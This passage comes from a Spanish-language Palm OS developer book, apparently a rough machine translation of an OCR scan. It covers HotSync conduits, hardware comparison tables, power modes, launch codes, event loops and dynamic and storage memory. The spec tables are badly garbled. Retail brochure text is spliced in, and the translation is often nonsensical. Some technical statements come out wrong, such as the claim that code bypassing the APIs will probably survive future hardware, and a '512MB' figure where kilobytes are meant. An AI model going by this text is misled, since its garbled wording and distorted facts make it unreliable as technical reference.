proveer, entonces usted puede poder usar una sincronización predeterminado de respaldo. En 
lugar de comparar el registro de la base de datos de la aplicación de mano por registro de 
datos de la PC. 


El computador de escritorio, el conducto de respaldo simplemente marca una copia de la base 
de datos entera y las transferencias hacia el computador de escritorio. Esto marcha 
perfectamente bien pues las bases de datos pequeñas de bases de datos hacen despacio el 
proceso HotSync si su aplicación almacena una parte de datos. 


El Capítulo 17, " Presentan los mecanismos de conducción Conduit Mechanics, " provee una 
introducción para conductos Palm OS en vías de desarrollo. Para detalles de como escribir 
conductos vaya al capitulo 18, " Creando a Conductos." 


Comparando Hardware de Versions Palm que se han 
desarrollado. 


Se han añadiendo justamente algunas características nuevas a la vez. Este cambio 
incremental es una ventaja para los desarrolladores de aplicación, porque significa que las 
nuevas versiones de hardware y funcionamiento de software de sistema requiera sólo una 
parte pequeña de recursos de sistema,en lugar de r de requerir que la aplicaciones sean 
reescritas desde el principio. 


Si bien Palm Computing sabiamente se ha abstenido de hacer de manera salvaje cambios en 
su sistema con el fin de no hacer pedazos el código fuente de aplicaciones creadas con un 
sistema operativo anterior , hay algunas diferencias significantes entre versiones del hardware 
que usted debería tener en cuenta cuándo diseñe su aplicación. 


El 1-1 características de dispositivos diferentes Palm OS. 


La referencia rápida Tabla 1-1 Historial de las Palm desde la salida de la Primera PDA en 1996 


Características Familia Pilot Pilot 1000 Pilot 5000 
Palm OS version 0) 0) 
e oeSESOr Motorola MC68328 Motorola MC68328 
DragonBall DragonBall 
Memory 128KB 512KB 
Flash ROM No No 
Backlight No No 
TCP/IP No No 
Infrared No No 
Enhanced LCD screen No No 
Battery 2 AAA alkaline batteries 2 AAA alkaline batteries 
Hardware expansion Replaceable memory card Replaceable memory card 


Características Familia Pilot PalmPilot Personal PalmPilot Profesional 
Palm OS version 2.0 2.0 
Motorola MC68328 Motorola MC68328 
Processor : A y 8 
DragonBall DragonBall 
Memory 512KB 1MB 


Flash ROM No No 


Backlight No No 


TCPAP No Si 

Infrared No No 

Enhanced LCD screen No No 

Battery 2 AAA alkaline batteries 2 AAA alkaline batteries 
Hardware expansion Replaceable memory card Replaceable memory card 


pala Palm | Palm III | Palm lle [Palm Iltx [Palm Illxe [Palm Ille | 


Palm OS version [3.0 Ba [3.1 E [3.5 | 


Ñ Motorola Motorola Motorola Motorola 


Processor ree MC68EZ328 [MC68EZ328 [MC68EZ328 |[MC68EZ328 
"DragonBall |"DragonBall [DragonBall |""DragonBall 


[gonBaL EZ" 


Memory 2MB 2MB [4MB [[8MB [sMB 


| | Yes; color 
as Its own 


| backlight 


TCPNP E E Si E E | 


[Color Active 
No Si Si Si Matrix TFT 
LCD screen 


2 AAA 2 AAA 
Battery alkaline alkaline 
batteries batteries 


[Open 
connector 
slot 


Enhanced LCD screen 


alkaline 
PEUCUES 


lalkaline 
¡batteries 


alkaline 
batteries 


[[Replaceable 
memory 
card 


¡connector 
¡slot 


Hardware expansion 


Características Palm Familia V 


8 VII 
Palm OS version 


Processor 


Memory 
Flash ROM 
Backlight 


TCPAP 


Infrared 
Enhanced LCD screen 


Battery 


Hardware expansion 


Palm V 


3.1 


Motorola 
MC68EZ328 
"DragonBall 
EZ" 


2MB 
Si 
MOS 


Si 


Si 

Si 

Bateria 
Recargable 
de iones de 
Litio 

Not possible 


Palm Vx 


ee 


Motorola 
MC68EZ328 
"DragonBall 
EZ" 


8MB 


Si 

Bateria 
Recargable 
de ¡ones de 
Litio 

Not possible 


Palm VII 


3.2 


Motorola 
MC68EZ328 
"DragonBall 
EZ" 


2MB 
0) 
Yes 


Si,Plus 
Wireless 
connectivity 


Si 
Si 


2 AAA alkaline 
batteries 


Not possible 


Palm VIlx 


3 


Motorola 
MC68EZ328 
"DragonBall 
EZ" 


sMB 

Si 

Yes 

Si,Plus less 
connectivity 
Si 

Si 

2 AAA 


alkaline 
batteries 


Not possible 


e Handspring  Handspring Handspring 
Características Palm Palm m100 Visor Deluxe TRGPro 
Palm OS version 3.0.1 3.3 3.3 3.3 
Motorola Motorola Motorola Motorola 
roseceor MC68EZ328  MC68EZ328  MC68EZ328  — MC68EZ328 
"DragonBall "DragonBall "DragonBall "DragonBall 
EZ" EZ" EZ" EZ" 
Memory 2MB 2MB 8MB 8MB 
Flash ROM NO) No No SI 
Backlight MES Yes Yes Yes 
TCPAP Si Si Si Si 
Infrared Si Si Si Si 
Si, pequeño 
Enhanced LCD screen (0.29 dot Si Si Si 


pitch) 


Bateria 


Recargable a paa a ee 2 AAA alkaline 
Battery deiónes de alkaline alkaline batteries 
a batteries batteries 
Litio 
: . Springboard  Springboard CompactFlash 
Hardware expansion Not possible e module slot: slot 


PalmOne Zire72 (Fecha de lanzamiento Mayo 2004) 


Características PalmOne 


Palm OS version 


Processor 


Memory 


Flash ROM 
Backlight 
TCPAP 


Infrared 


Enhanced LCD screen 


5.2.8 


ARM para 
música y video 
de 312 MHz 


32MB 
expanndible 
con targetas 
SD Card 

SI 

MES 

Si 


Si 


320x320 pixeles 
color 


Funciones: 

- Reproductor de MP3 

- Reproductor de Videoclips 
- Grabadora de voz digital 

- Cámara digital 

- Cámara de video 


Especificaciones Generales: 

- Tecnología bluetooth 

- Slot de expansión para tarjetas SD 

- Entrada para audífonos estéreo 

- Procesador ARM para música y video 
de 312 MHz 

- Memoria interna de 32 MB expadible 
con tarjetas SD 

- Navegador de 5 vías 

- Bocina integrada 

- Pantalla a color de 320x320 pixeles 
- Botones de acceso rápido 

- Puerto Mini USB para sincronización 
- Compatible con Microsoft Word y 
Excell 


Especificaciones Cámara digital: 

- Resolución de la cámara de 1.2 mega 
pixeles 1280x960 

- Zoom digital 2x 

- Video de 320x240 con audio 


Aplicaciones: 

- Almacenar y reproducir fotos, videos, 
E-books y archivos MP3 

- Graba anotaciones de voz 

- Bluetooth para conexión inalámbrica a 


Internet, equipos compatibles o 
teléfonos celulares 

- Sincroniza tu correo directamente del 
Outlook , Mide solo 11.6X7.5X1.6 cm 


Bateria 
Battery Recargable de 
lones de Litio 


Hardware expansion SI 


Características PalmOne PalmOne Tungsten T5 (Fecha de lanzamiento Enero 2005) 
256MB DE ALMACENAMIENTO 


Palm OS version 6 Cobalt 
La computadora de mano Tungsten? TS 
destaca por su memoria de 256 MB, que 
equivale a más de 200 fotografías 
digitales o más de 3 horas de música 
MP3. Y como la memoria no es volátil, 
no perderás un solo dato aunque se agote 
la batería. 
IntelO 416 MHz PANTALLA EXTRA GRANDE 
XScale Empieza a 
fabricar Dentro de su categoría de productos, el 
Processor Microprocesadores Tungsten? T5 tiene la pantalla de alta 
para Dispositivos resolución de mayor tamaño, lo que 
moviles. permite aprovechar al máximo sus 


muchas funciones: basta pulsar un icono 
para girar la pantalla de 480 x 320 píxeles 
horizontal o verticalmente y así ver hojas 
de cálculo, correo electrónico, etc., del 
mejor modo posible. 


CONEXIÓN INALÁMBRICA 


El Tungsten? TS dispone de tecnología 
inalámbrica BluetoothO9 incorporada, con 
la que puedes intercambiar archivos y 
datos con aparatos Bluetooth cercanos. 
Con el Tungsten? TS y un teléfono móvil 
compatible, podrás consultar el correo 


256MB expanndible 
Memory con targetas SD 
Card 


Flash ROM Si 
Backlight MES 
TCPAP Si 
Infrared Si 
480 x 320 pixeles 


Enhanced LCD screen 
color 


Bateria Recargable de 


Battery iones de Litio 


electrónico y acceder a Internet por vía 
inalámbrica. 


PRODUCTIVIDAD EN TODO 
MOMENTO 


Llévate documentos de Word, Excel, 
PowerPointO y cualquier otro tipo de 
archivos adonde quieras. 


ENCUENTRA LO QUE NECESITAS 


La pantalla Favoritos del Tungsten? T5 es 
personalizable y convierte la búsqueda en 
un proceso más que sencillo. 


MP3, FOTOS Y VIDEOS PARA 
LLEVAR 


Con la Tungsten? TS dejara 

su reproductor de MP3. Además, puedes 
escuchar música digital y disfrutar de 
vídeos y fotografías. Ahora es mas facil 
transferir archivos de musica y fotos de su 
PC a su computadora de mano. 


OBTENGA EL PODER QUE NECESITA 


La Tungsten? T'5 cuenta con un 
procesador Intel Y 416 MHz XScale que 
ofrece todo el poder que necesita. 


FACIL Y RAPIDA TRANFIERA 
ARCHIVOS 


Nueva aplicación para tranferir archivos y 
carpetas desde y hacia su PC. Ahora todo 
lo que tiene que hacer es arrastrar y soltar. 


Hardware expansion SI 


Características PalmOne PalmOne LifeDrive (Fecha de lanzamiento Julio 2005) 
Palm OS version 6 Cobalt Administrador de archivos 
inteligentes LifeDrive 
Processor el 416 MHz Visualiza y crea archivos compatibles 
mE con Word,excel,power point, Acrobat 
reader. 
Disco duro de 4GB Visualización en sentido vertical y 
(3.85GB accesible horizontal 
Memory por el usuario), 4GB 


Soporta acceso inalámbrico seguro a 
correo electronico con anexos. 
Microsoft Exchange ActiveSync 
integrado 


ó más expandible 
con targetas SD Card 


Flash ROM Si 
Sotfware para camara 
Backlight Yes Reproductor de MP3 
== Criptografía de 128 Bits 
TCPAP At a e GIGAS DE MEMORIA 
Bluetooth v.1.1 
WI-FI 
Pantalla a color de alta resolución: 320 x 480 pixeles color MUSICA 
VIDEO 
Battery Bateria Recargable de DOCUMENTOS DE OFICINA 
¡ones de Litio BLUETOOTH 
¡ 2 
| Si SD Card de4GB_ ¿QUE TEMUEVE: 
Hardware expansion más 


PRECIO US$527 (APROX U.S.A 10.10.2005) 


odos los modelos estan en www.palmone.com/latin 


Las series WorkPad de la IBM son esencialmente clones de l!l PalmPilot Professional, Palm, y 
Palm V, y tienen las mismas características. Ambos la línea Symbol SPT y el Qualcomm pdQ 
se basan en el Palm lIl y comparten todo sus características, pero incluyen hardware adicional 


para los propósitos especializados; La serie SPT incluye equipo de tomografía de código de 
barras, y en el SPT 1740, un radio para la conexión para un Spectrum 24 red inalámbrica 
shortrange. El pdQ tiene un teléfono celular integrado. 


fortunadamente para los desarrolladores de software de Palm, estas diferencias del 
hardware hacen que estas diferencias de hardware les sean cualesquier insignificantes en la 
perspectiva de programacion con interfaces avanzadas de programación (APIs) en Palm. Sus 
aplicación no poner en duda la compatibilidad en futuras versiones, Hacemos mención que 
SONY no se quedo atrás pero hasta el 2004 dejo de crear Hardware para PDA Palm similar 
con características de las PalmOne, Pues enfoco más su mercado a las PC de escritorio, y 
laptos. 


La Sistema operativo Palm determina qué tán disponibles son las características antes de 
intentar usar una parte del hardware que no existe en particular en la handheld. 


. Para más información en determinar qué características están disponibles para su 
aplicación, vea el Capitulo 10, " Programando elemntos de Sistema." 


Físicamente, las Palm OS handhelds han cambiado una pequeña cantidad. Las computadoras 
palm han aplicado diseño industrial e innovador a los más recientes modelos, y los casos de 
la serie Symbol SPT y el Qualcomm pdQ son hechos diferentemente para acomodar un lector 
de código de barras y un teléfono celular, respectivamente. El Palm VII también tiene un caso 
ligeramente mayor, ganando él sobrenombre amistoso " FrankenPalm " de algunos usuarios, 
por la " frente " ampliada requerida para mantener los componentes de radio inalámbricos. 


simismo, el lllc Palm está un poco más grande que otros handhelds de la serie Palm lll por 
extra espacio requerido para una pantalla de color y unas baterías recargables de ¡ones de 
litio. 


odas las Palm actuales OS handhelds tienen el mismo trazado familiar de botones del 
hardware y estampado por serigrafía en el área del Graffiti. 


irando hacia el futuro 


La documentación oficial de Palm OS acentúa la importancia del desarrollador no haciendo 
suposiciones acerca del hardware que está bajo de sus aplicaciones. Esto es importante 
porque el hardware puede cambiar, y si su código hace caso omiso del Palm OS APls y 
directamente gana acceso al hardware, entonces su aplicación es muy probablemente pueda 
sobrevivir a futuro. 


La computación en palm tiene grupos separados trabajando en hardware y software. El grupo 
desarrollando para Palm OS tiene intención de añadir características para el sistema operativo 


que el grupo del hardware necesariamente no incorporará en handhelds que se hizo por Palm 
Computing. En lugar de eso, estos APIs serán usados por tercero entra en asociación el hacer 
su propio hardware que pone a funcionar el Palm OS. Ya, los fabricantes como Handspring y 

RG han soltado sus handhelds poniendo a funcionar al Palm OS, y otras compañías, como 
Sony, han anunciado sus intenciones para soltar hardware nuevo que use el Palm OS. Hay 
una oportunidad igualmente buena que algunos de estos dispositivos pueden ser muy 
desemejantes del cultivo actual de Palm handhelds, incorporar hardware nuevo presenta 
como pantallas mayores. 


Use las Palm OS APIs en lugar de hacer llamadas al hardware. El Palm OS APIs es muy 
completo, y si usted persevera en usar las funciones provistas, entonces su aplicación 
continuará funcionando como reloj en dispositivos nuevos. Esto fué una Referencia rapida. 


Resumen 


Este capítulo se ha explicado la filosofía detrás de la plataforma computacional Palm y 
presentó a usted para la única disposición mental requerida para escribir aplicaciones de 
mano efectivas. Usted ahora debería saber lo siguiente: 


. El exito de la computadora de mano Palm depende por ser un dispositivo pequeño con 
interfaz ergonómica y la integración de mesa libre de irregularidades. 


. El desarrollo de aplicación de mano es muy diferente de desarrollo de aplicación de mesa y 
requiere que usted trabaje dentro de un número de restricciones. 


. Conectando su dispositivo de mano al computador de escritorio las transferencias se hacen 
ravés de un conducto llamado HotSync que respalda bases de datos , historiales y grabar 
aplicaciones de PC a PDA. 


. Sin embargo un número de Palm OS handhelds están en el mercado, son muy similares en 
orma y funcionamiento. 


. Usted debería llamar funciones Palm OS directamente APIS ganando acceso al hardware en 
su aplicación y así asegurar que sus aplicaciones continuará trabajando en hardware futuro. 
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En Este Capítulo 


Iniciaremos con el uso del sistema operativo, corriendo aplicaciones Palm , Veremos aplicaciones 
trabajando con la memoria de la Palm, 

Se vera como se usan los recursos Y la interfaz del usuario, Así como los elementos para comunicarse con 
Otros dispositivos, Compararemos las versiones del sistema operativo Palm OS. 


Comprendiendo el sistema operativo palm Os 


El capítulo previo se presentó a usted la filosofía detrás de plataforma computacional Palm y la disposición 
mental que requiere para escribir aplicaciones para ella. Aún con las limitaciones impuestas en una 
aplicación Palm el hardware y la naturaleza muy móvil de uso de Palm, Palm OS provee una riqueza de 
características para el desarrollado. El Palm OS manipula todo de interacción del usuario para la dirección de 
la base de datos para comunicaciones seriales. Este capítulo provee una visión general de la estructura del 
Palm OS y cómo afecta al diseño de aplicaciones. 


Usando el poder de Palm OS 


Por su tamaño pequeño, una Palm OS ó computadora de mano debe ocuparse de una forma muy diferente a 
un computador de escritorio. 


El Palm OS es diseñado para minimizar uso de poder, haciendo aun apariencia de sistemas ecológicamente 
al consulir poca energia de baterias. Las máquinas de PC de escritorio no ayudan al ahorrar dinero en la 
cuenta eléctrica, pero los dispositivos Palm OS tienen energía eficiente para una razón diferente: La vida de 
la batería entonces es larga. 


La mayoría de las Palm funcionan con un par de baterías del álcalinas AAA y aun los dispositivos de la 
familia Palm V, con sus baterías recargables del ¡on del litio, tiene poco el poder de escatimar. El Palm OS 
logra aumentar un poquito el poder disponible por semanas de operación normal, lo cual es realmente 
asombroso aun cuando a usted le da la impresión que el dispositivo nunca esta apagado. 


Una Palm OS (Computadora de mano) constantemente provee de energia para los subsistemas importantes. 
El botón del on/off en el dispositivo sólo pone el dispositivo entre un modo de poder bajo y un modo más 
activo. La energia de las baterias no debe estar completamente apagado en el Palm, porque la memoria, 
reloj de tiempo real, y los circuitos del sistema requiere algún poquito de poder constantemente para la 
operación correcta. Esto es particularmente importante en caso de la memoria porque el dispositivo 
almacena aplicaciones y datos permanentes en RAM, lo cual pierde datos si no tiene enrgia suficiente. 


El Palm OS soporta tres modalidades de operación: 


. Función siesta. Éste es el modo que un usuario Palm identifica a su dispositivo como " completamente 


Apagado." Todo en el dispositivo que no requiere poder es cerrado, incluyendo la pantalla, el digitalizador, y 
el reloj principal de sistema. 


Sólo los sistemas esenciales se interrumpen como el sistema de circuitos de generación y el reloj de tiempo 
real es activo, junto con un poco de poder para conservar la RAM y sus datos. Cuando el dispositivo está en 
el modo de siesta, sólo hay ciertas interrupciones, tal como la entrada del puerto serial ó usb de computadora 
o al presionar un botón del hardware la palm volvera a despertar y se encendera la Palm, Después de un 
período de tiempo inactivo inactivo por el usuario (de uno a minutos), el dispositivo caerá en modo de siesta. 


. El modo de cabezada. La mayoría de las veces el dispositivo parece estar encendido ", " está en el modo 
de cabezada. El reloj principal, digitalizador, y pantalla LCD se encienden, y el reloj del procesador no está 
marchando pero no ejecutando instrucciones. Cuando no haya usuario introduzca en la computadora ir en 
procesión, el sistema introduce modo de cabezada. Cualquier hardware interrumpa (como la entrada del 
texto) que el procesador recibe sacará el procesador de cabezada, lo cual es mucho más rápido que 
saliendo de modo de sueño, porque el dispositivo no necesita energizar arriba cualquier de su hardware 
periférico. 


. Poniendo a funcionar Un modo. En este modo, el procesador activamente ejecuta instrucciones.La 
entrada del usuario en el modo de cabezada pondrá el dispositivo en el modo corredor, como voluntad uno 
interrumpe mientras en el modo de cabezada de modo o de sueño, como la alarma de sistema apagándose 
o el usuario presionando un botón del hardware. El dispositivo se queda en correr modo lo suficientemente 
largo de tramitar la entrada del usuario, usualmente menos de un segundo, y entonces inmediatamente 
desciende dormitar modo. La mayoría de aplicaciones causarán el sistema para entrar en poner a funcionar 
modo sólo 5 por ciento del tiempo. 


Poniendo a funcionar una Aplicación Palm OS 


El Palm OS tiene un núcleo Kernel multitarea preventivo. Sin embargo, el Usuario al ejecutar una aplicacion , 
tipo Application Shell (UIAS), la parte del OS responsable para manejar aplicaciones que exhiben una 
interfaz del usuario, pone a funcionar aplicación en único tiempo. Normalmente, la única tarea corriendo es la 
UIAS, lo cual llama al código de aplicación como una subrutina. Los VIAS no ganan control otra vez hasta 
que la aplicación que esta actualmente corriendo se cierra, en cuyo punto las llamadas a las UIAS son 
inmediatamente llamadas a la siguiente aplicación como otra subrutina. 


Nota : Las aplicaciones no pueden estar multi-Abiertas al mismo tiempo, porque deben correr dentro de un 
solo UIAS. 


Ciertas llamadas en una aplicación causará que el Sistema operativo lanze una tarea nueva. Por ejemplo, la 
aplicación HotSync inicia otra tarea al omunicarse con el puerto serial/Usb con la computadora de escritorio. 
La comunicación serial tiene una prioridad inferior que la tarea principal de la interfaz del usuario. 


Esta creación de una tarea nueva tiene en cuenta más comunicación optimizada, ambos con el computador 
de escritorio y el usuario. 


Si el usuario toca la pantalla se cancela la sincronizacion, entonces la tarea de la interfaz del usuario 
prioritaria más alta de ejecuta inmediatamente al tocar la pantalla, teniendo en cuenta la respuesta rápida por 
la entrada del usuario, aun cuando la tarea serial usar la mayor parte de los procesador cronometran para 
comunicarse con el computador de escritorio. Sin embargo, porque allí usualmente no es cualquier 


interacción del usuario durante una sesión HotSync, la tarea serial usa más tiempo del procesador la cual 
necesita para una comunicación rápida. 


Nota: Sólo el software de sistema puede emprender una tarea nueva. El código de aplicación no tiene 
acceso directo a las multitareas de las APIs (APl=Librerias de interfase avanzada) en Palm OS . 


Como responde el sistema al cargar Codigos 


Cuando el sistema inicia una aplicación, llama una función llamada PilotMain (parecido a la función main 
principal en un programa de lenguaje C) y le pasa a ella un código al iniciar. El código iniciado puede decir si 
la aplicación comienza y exhibe su interfaz del usuario, en cuyo caso pondrá en marcha el seguimiento de un 
acontecimiento y procesará el acontecimiento en la cola. Este tipo de arranque es llamado inicio normal. 


Alternativamente, el código de inicio puede decir si la aplicación realizara alguna tarea pequeña. 


sin exhibir a su usuario la interfase, y entonces sale. Palm OS busca la de función de trabajos globales por 
este tipo, enviando un código al iniciar cada aplicación en el dispositivo requerido y hace una búsqueda de 
sus propias bases de datos por sus cadenas de caracteres. Los códigos cargados también existen para 
muchos otros propósitos, tan inaugurales la aplicación para un registro específico o hacer saber la aplicación 
que un HotSync justamente ha sido completado. 


Cuando una aplicación recibe cualquier código cargado aparte de una carga normal, el control no pasa para 
por el camino del acontecimiento, pero más bien para otra función en la aplicación que cumple con su trabajo 
fuera del caminino del acontecimiento. 


Referencia intersectada: cargando codigos está cubierto con más detalle en el capitulo 4, " Escribiendo a 
Su Primer aplicacion en Palm OS." 


Manipulando Eventos 


Una aplicacion de Palm OS es un acontecimiento-conducido, recibiendo eventos desde el sistema operativo 
y cualquier manipulacion o pasándolos de regreso para ser manipulados por el propio sistema operativo. Una 
estructura de acontecimiento describe el tipo de acontecimiento que ha tomado lugar (por ejemplo, un golpe 
ligero en un botón de la pantalla), así como también la informacion relaciónada con ese acontecimiento, Asi 
como las coordenadas de la pantalla al tocar con el lapiz optico. Durante el proceso normal, la ejecución 
pasa para al acontecimiento de la applicacion, lo cual rescata acontecimientos de la cola de acontecimientos 
y los lee según el tipo de acontecimiento. 


Los acontecimiento enlazados devuelven la mayoría de acontecimientos para el OS, porque el sistema ya 
tiene facilidades para ocuparse de tareas comunes como los menús que muetra o determina qué botón en la 
pantalla fue al que se golpeó ligeramente. Esos acontecimientos que no son manipulados por los OS van 
para el propio manipulador de acontecimiento de la aplicación, lo cual manipula los acontecimientos si son 
interesantes para la aplicación, o los pasa de regreso al evento enlazado. 


Una aplicación típica Palm OS se quedará en acontecimiento enlazado hasta que reciba un acontecimiento 
diciéndole para cerrar la aplicación, en cuálquier punto del paso del acontecimiento pasará el control a otra 
función que realiza operaciones de limpieza total y prepara el programa para ser cerrado. 


El LOOP ó enlace estándar del acontecimiento es un ingrediente importante en la dirección de poder en una 
aplicación Palm OS. Una llamada enlazada de acontecimiento normal OS funciona procesando en la cola del 
acontecimiento, y estas funciones saben bastante acerca del poder directivo para meter el dispositivo en 
modo siesta si ninguno de los acontecimientos actualmente necesitan el procesamiento. Usando un enlace 
de evento estándar de acontecimiento también asegura que la aplicación se quede adelante por algunos 
minutos, los system's operativos se apagara automaticamente que es una caracteristica del dispositivo para 
entrar en el modo de siesta . 


Referencias rapida: Los eventos enlazados están cubiertos con más detalle en el capitulo 4, " Escribiendo a 
Su First Palm OS Application." 


Manejando la Memoria 


Porque la Palma OS fue diseñado para funcionar con el poder bajo y barato, El bajo poder de los dispositivos 
de mano, Es muy bueno aun ocupándose de condiciones apretadas de memoria. La Palm OS no manipula 
toda la carga de transacción con un espacio de memoria tan limitado, sin embargo. 


Las restricciones de memoria en un Palm el dispositivo OS requieren que usted ponga atención meticulosa 
para cómo usa usted memoria en su aplicación. Por consiguiente, entender la arquitectura de memoria del 
Palm OS es de suma importancia escribiendo una aplicación exitosa. 


Ambos el ROM y RAM de un dispositivo Palm OS residen en un módulo de memoria llamado tarjeta. En los 
primeros dispositivos , ésta constituye una tarjeta fisica, Las cuales el usuari fácilmente puede actualizar ó 
reemplazar para una mejor cantidad de memoria disponible, intercambiar los OS y aplicaciones en el ROM 
para versiones más nuevas, o ambos. Sin embargo, una " tarjeta " es sólo una abstracción lógica usada por 
el Palm OS para describir una memoria que el área solió contener ROM y RAM; Un dispositivo puede tener 
cualquier número de targetas lógicas o ninguna del todo. 


A partir de Palm OS 3.5, hay tarjeta única disponible (tarjeta 0), pero Palm futuro OS handhelds realmente 
puede tener más que una tarjeta de memoria. 


El Palm OS es creado alrededor de una arquitectura de memoria de 32 bits, con tipos de datos 8, 16, y 32 
bits de longitud. Las direcciones de memoria son de 32 bits de longitud, otorgandole al sistema operativo un 
total de 4GB de espacio de direcciones en el cual puede almacenar datos y código. El sistema operativo 
reserva 256MB de espacio de direcciónes para cada tarjeta. Las versiones futuras del Palm OS tienen un 
montón de cuarto para expandir, Los dispositivos actuales usan sólo una fracción del espacio disponible para 
direcciónes. 


Cuidado:La arquitectura de memoria descrita aquí es representativa sólo implementada en la versión Palm 
OS 3.5 y anteriores, y está sujeta a cambiar en versiones futuras. 


Confiar en estos detalles específicos en la implementación puede causar su aplicación pueda chocar ó no 
funcionar en versiones futuras de los Sistemas operativos Palm. Siempre use las APIs de memoria Palm OS 
manipular memoria. 


La RAM en Palm OS es dividida en dos áreas: La RAM dinámica y la RAM de almacenamiento. 


Creo que la figura 2-1 gráficamente bosqueje estas áreas de memoria y lo que contienen. 


Dynamic RAM 


Systern Dynamic 
Allocation 
(TCPP 
Applications 
/ Stored Data 
Application Dynamic Storage RAM j Preferences 
Allocation 


Figure 2-1: RAM in the Palm OS is divided into two areas: dynamic RAM and 
storage RAM. 


La RAM dinámica sirve para muchos de los mismos propósitos como RAM en un computador de escritorio; 


Provee un espacio para el almacenamiento temporal de variables globales y otros datos eso no requiere 
persistencia entre ejecuciones de una aplicación. 


La RAM de almacenamiento es usada mucho de la misma forma que los archivos de sistema del disco duro 
en una Pc de escritorio; El aproveechamiento y el almacenamiento permanente para aplicaciones y los 
datos. Ambos dinámico y el almacenamiento RAM están adicionalmente detallados en la siguiente sección. 


RAM dinámica 


El área entera dinámica de la RAM del dispositivo se usa para implementar un almacenamiento-dinámico. Un 
almacenamiento dimanico es un área contiguo de memoria que maneja y contiene unidades más pequeñas 
de memoria. Estas unidades más pequeñas son llamados trozos(chunks). Un trozo es un área contiguo de 
memoria entre 1 byte y ligeramente menos de 64KB en el tamaño. Todos los datos en el ambiente Palm OS 
son almacenados en trozos(chunks). 


Cuidado:Las implementaciones actuales del Palm OS restringen trozos ó chunks para menos de 64KB en el 
tamaño, pero esta restricción no puede existir en versiones futuras de los OS. Otra vez, siempre use los APIs 
de memoria Palm OS para manipular memoria. 


la acumulación dinámico provee memoria para varios propósitos: 

. La aplicación y el sistema de las variables globales 

. La asignación de recursos por el sistema quizas al cargar una aplicación, como el TCP/IP , las pilas , y el 
Infrarrojo IrDA 

. (Stack) Almacenamiento y retiro de la memoria en un orden inverso al de la entrada al correr una aplicación 
. Asignación temporal de memoria 

. Las asignaciones dinámicas por las aplicaciones 

La tabla 2-1 muestra como se asigna el espacio a las areas dinámicas en versiones diferentes versiones del 
sistema operativo, y provee una lista de fallas echas por la memoria. 


Aviso estas se podrian usar aun en versiones recientes, el almacenamiento dinámico de recursos de sistema 
es todavía una cantidad muy pequeña de memoria, la mayor parte de cuál está usado por el sistema 
operativo mismo. Muy poca memoria se queda para el uso de aplicación. 


Table 2-1 
The Dynamic Heap in Various Versions of Palm OS 


OS 3.x (more than OS 2.0 (1MB OS 2.0/1.0 
1MB total RAM; total RAM; (512MB total RAM; 
Memory Usage ICPAP and IrDA) TCPAP only) no TCP/P or IrDA 


Total dynamic memory 96KB 64KB 32KB 


System globals (Ul about 2.5KB about 2. about 2 
globals, screen butter 

database references, and 

so torth.) 


TCP/IP stack 32KB 32KB OKB 
System dynamic variable amount about about * 
allocation (IrDA, “Find” 

window, temporary 

allocations) 


Application stack (call AKB (default) 
¿and local variable 


Remaining space 
(dinamic allocations 
application global 
variables, static variables) 


Toda la RAM dinámica está dedicada al uso dinámico. Aun si algunas áreas dinámicas no se usan 
actualmente (por ejemplo, si ninguna comunicación de TCP/IP actualmente no toma lugar), Esa memoria 
está todavía disponible sólo para las afijaciones dinámicas perfiladas en Tabla 2-1. 


Las aplicaciones ubican, manipulan, y libreran el espacio de la memoria dinámica acumulada usando el la 
memoria manger Palm OS. Las funciones encargadas de memoria permiten uso seguro de la memoria 
dinámica en el dispositivo, a pesar de cómo corre la versión del OS estructuras internamente de esa 
memoria. 


Referancia rapida:Vea el Capitulo 4, “ Escribiendo Su primer applicacion palm Os, ” para más detalles 
acerca de los APIs administradores de memoria. 

Almacenamiento de Memoria RAM 

En el dispositivo que no está dedicado a la acumulación dinámica está dividida en el número de 
almacenamiento acumulado. El tamaño y el número de acumulaciones de almacenamiento están bajo la 
dependencia de versión de los OS y la cantidad total de RAM disponible en el dispositivo. En versiones 1.0 y 
2.0 del Palm OS, la RAM de almacenamiento es dividida en varias partes de almacenamiento de 64KB. 3.x 
de versión trata toda la RAM de almacenamiento disponible como un montón grande de almacenamiento. 


El uso de la versión 3.x del SO usa una acumulacion grande de memoria ,es una mejora grande sobre 
anteriores versiones del Palm OS porque previene fragmentación de memoria de almacenamiento. La 
fragmentación ocurre como los montones de almacenamiento se llenen de datos. Aun si sobra la memoria 
libre total para un registro nuevo, no puede sobrar el espacio contiguo en cualquier montón dado a contener 
eso sin precedente. 


Por ejemplo, asuma que hay cuatro montones de almacenamiento, cada uno con 64KB de tamaño, con 
40KB de memoria llenó en cada montón. Hay un total de 96KB de memoria libre, pero si una aplicación trata 
de ubicar a 50KB, entonces no podrá, porque hay, a lo mejor, sólo 24KB disponible en cualquier montón 
dado. La siguiente figura ilustra esta situación y muestra cómo las versiones diferentes de Palm OS tratan de 
ocuparse de este problema. Observe que las posteriores versiones del Palm OS se ocupan demasiado mejor 
de fragmentación que las anteriores versiones. 


La versión 1.0 usa una estrategia ineficaz de almacenamiento que intenta conservar todos los montones 
igualmente llenos, lo cual de hecho causa cada afijación nueva para ser más difícil que lo último. La versión 
2.0 mejora esto un poco de ubicando memoria del montón con el espacio más libre. 2.0.4 de sistema Update 
más allá mejora este esquema, moviendo trozos de memoria del montón menos llenado para otros montones 
hasta sobra espacio para la afijación nueva. 


La versión de la palma OS 3.0 finalmente se deshizo de problemas de fragmentación metiendo toda memoria 
de almacenamiento en un montón grande. 


La fragmentación en anteriores dispositivos Palm es otra buena razón para hacer su aplicación en tantos 
trozos pequeños como posible. No sólo está allí menos RAM total disponible en anteriores dispositivos, pero 
la fragmentación de memoria puede hacer lo que parece una aplicación razonablemente de tamaño 
imposible para instalar en versiones anteriores al Os 3.1 porque lo programadores no usaron la 
desfragmentación total. 


Versions 1.0 and 2.0 
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Version 3.0 
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Memory fragmentation in different versions of the Palm OS 


Los trozos de memoria ó (Memory chunks) en un montón de almacenamiento son llamados registros. Cada 
registro es parte de una base de datos implementada por el administrador de datos Palm OS. Una base de 
datos es simplemente una lista de memoria de trozos y alguna información del encabezado de la base de 
datos. La mayoría de las veces, los registros en una parte particular de la base de datos algún tipo de 
asociación, como cada registro representando una cita en el Date Book Hacen una reservación. 

La Palma que el gerente de datos OS provee funciona para crear, abriéndose, cerrándose, y suprimir bases 
de datos, así como también funciona manipular registros dentro de esas bases de datos. 

Una base de datos en el Palm OS sirve mucho la misma función como un archivo en un computador de 
escritorio. A merced de los contenidos de los registros de una base de datos, una base de datos dada puede 
representar una aplicación, una biblioteca compartida, o datos de aplicación simplemente almacenados. 


